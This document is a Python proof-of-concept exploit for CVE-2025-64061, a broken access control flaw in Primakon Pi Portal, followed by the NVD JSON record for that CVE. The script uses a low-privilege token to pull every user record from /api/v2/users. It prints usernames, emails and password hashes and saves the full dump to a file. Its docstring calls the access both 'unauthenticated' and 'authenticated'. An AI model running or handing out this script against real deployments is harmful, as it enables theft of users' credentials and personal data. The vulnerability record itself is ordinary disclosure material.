CVE-2025-64061

# CVE-2025-64061 PoC - Primakon Pi Portal Unauthorized User Data Exposure # Affected Version: Primakon Pi Portal <= 1.0.18 # Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-64061 import requests import json import sys def exploit_cve_2025_64061(target_url, token): """ Exploit for CVE-2025-64061: Unauthenticated access to /api/v2/users endpoint This PoC demonstrates how any authenticated user can retrieve all user data including password hashes due to broken access control. """ headers = { 'Authorization': f'Bearer {token}', 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } # Target endpoint with broken access control endpoint = f'{target_url}/api/v2/users' print(f'[*] Target: {target_url}') print(f'[*] Exploiting endpoint: {endpoint}') try: # Send GET request as low-privilege authenticated user response = requests.get(endpoint, headers=headers, timeout=10) if response.status_code == 200: data = response.json() print(f'[+] SUCCESS: Retrieved {len(data)} user records') print('\n[+] Sample user data with password hashes:') for user in data[:5]: # Display first 5 users print(f" Username: {user.get('username', 'N/A')}") print(f" Email: {user.get('email', 'N/A')}") print(f" Password Hash: {user.get('password_hash', 'N/A')}") print(' ---') # Save full response for further analysis with open('cve_2025_64061_users.json', 'w') as f: json.dump(data, f, indent=2) print('\n[+] Full data saved to cve_2025_64061_users.json') return True else: print(f'[-] Failed: HTTP {response.status_code}') return False except requests.exceptions.RequestException as e: print(f'[-] Error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 3: print('Usage: python cve_2025_64061.py <target_url> <auth_token>') print('Example: python cve_2025_64061.py https://portal.example.com abc123token') sys.exit(1) exploit_cve_2025_64061(sys.argv[1], sys.argv[2])

{"cve": {"id": "CVE-2025-64061", "sourceIdentifier": "[email protected]", "published": "2025-11-25T17:15:50.440", "lastModified": "2025-12-01T14:43:55.527", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Primakon Pi Portal 1.0.18 /api/v2/users endpoint is vulnerable to unauthorized data exposure due to deficient access control mechanisms. Any authenticated user, regardless of their privilege level (including standard or low-privileged users), can make a GET request to this endpoint and retrieve a complete, unfiltered list of all registered application users. Crucially, the API response body for this endpoint includes password hashes."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:primakon:project_contract_management:1.0.18:*:*:*:*:*:*:*", "matchCriteriaId": "48EDD273-2C46-43C9-9473-27D2C14040CB"}]}]}], "references": [{"url": "https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64061.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.primakon.com/rjesenja/primakon-pcm/", "source": "[email protected]", "tags": ["Product"]}]}}